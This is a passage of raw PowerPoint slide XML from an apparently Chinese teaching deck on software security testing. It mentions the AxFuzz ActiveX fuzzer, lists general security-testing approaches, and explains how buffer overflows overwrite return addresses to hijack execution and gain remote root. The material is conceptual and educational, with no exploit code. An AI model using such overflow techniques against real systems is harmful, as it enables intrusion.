              <a:t>工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，必须配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一起使用，最新的版本已经支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IE8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一个开源工具，可以列举</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>COM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（组件对象模型，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>ctive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主要手段）的所有属性，并进行简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>读者可以通过阅读这个工具的源码学习怎样编写自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>ctive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>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xmlns="" val="60164888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8.3.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>软件产品安全性综合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4490908"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一次安全性综合测试实际上就是利用前面提到的一些工具和方法进行一轮多角度、全方位的综合性攻击和测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全性测试的主要目的是确保软件不会去完成没有预先设计的功能，以下是一些通用的思路和方法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、畸形的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>结构</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、畸形的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、用户输入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、验证资源之间的依赖关系</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、伪造程序输入和输出时使用的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、古怪的路径表达方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、异常处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、访问控制与信息泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、对程序反汇编</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2083234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8.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4344259"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出漏洞属于基本的编程错误，这类错误随着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语言的出现而出现。当时人们为了追求语言的高效性，没有注重其安全性，在初始化、复制或移动数据时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语言不支持内在的数组边界检查。这种设计虽然提高了代码的执行效率，但可能导致数据的越界访问。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过堆栈溢出获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>权限是目前使用的相当普遍的一项黑客技术，它也被广泛应用于远程攻击中，通过对进程的堆栈溢出实现远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>rootshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术，已经被很多实例实现。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统中同样存在着堆栈溢出的问题。随着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系列平台上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>nternet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序越来越多，低水平的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序就成为系统的致命伤。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="15580109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8.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出的基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>原理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出漏洞的危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.1.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="5232789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8.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4344259"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出漏洞属于基本的编程错误，这类错误随着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语言的出现而出现。当时人们为了追求语言的高效性，没有注重其安全性，在初始化、复制或移动数据时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语言不支持内在的数组边界检查。这种设计虽然提高了代码的执行效率，但可能导致数据的越界访问。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过堆栈溢出获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>权限是目前使用的相当普遍的一项黑客技术，它也被广泛应用于远程攻击中，通过对进程的堆栈溢出实现远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>rootshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术，已经被很多实例实现。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统中同样存在着堆栈溢出的问题。随着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系列平台上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>nternet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序越来越多，低水平的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序就成为系统的致命伤。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="10846834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8.1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出的基本原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4068214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区是程序运行时在内存中临时存放数据的地方。当程序存放的数据块大小超过了程序事先申请到的（内存）缓冲区大小时，就会发生缓冲区溢出。如果溢出的数据块恰好覆盖与缓冲区相邻的子程序或函数返回地址，而覆盖这一地址的又恰好是一个程序的入口，那么该程序将自动运行。若在这过程中被非法调用程序是一个入侵程序，那么运行这一入侵程序的系统就将面临着被攻入的危险。缓冲区溢出攻击指的就是这种系统攻击的手段，通过往程序的缓冲区内写入超过其长度的内容造成缓冲区的溢出，破坏程序的堆栈，使得程序转而执行其他指令。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1812628092"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Droplet">
  <a:themeElements>
    <a:clrScheme name="Droplet">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="355071"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="AABED7"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="2FA3EE"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="4BCAAD"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="86C157"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="D99C3F"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="CE6633"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A35DD1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="56BCFE"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="97C5E3"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Droplet">
      <a:majorFont>
        <a:latin typeface="Tw Cen M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roplet">
      <a:fillStyleLst>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
        <a:solidFill>
          <a:schemeClr val="phClr">
            <a:tint val="69000"/>
            <a:satMod val="105000"/>
            <a:lumMod val="110000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:gradFill rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="94000"/>
                <a:satMod val="100000"/>
                <a:lumMod val="108000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:shade val="100000"/>
                <a:satMod val="100000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="72000"/>
                <a:satMod val="120000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
      </a:fillStyleLst>
      <a:lnStyleLst>
        <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="phClr">
              <a:shade val="60000"/>
            </a:scheme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effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="69000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="0" rev="0"/>
            </a:camera>
            <a:lightRig rig="balanced" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d prstMaterial="plastic">
            <a:bevelT w="25400" h="25400"/>
          </a:sp3d>
        </a:effectStyle>
      </a:effectStyleLst>
      <a:bgFillStyleLst>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
        <a:gradFill rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="64000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:gradFill rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="84000"/>
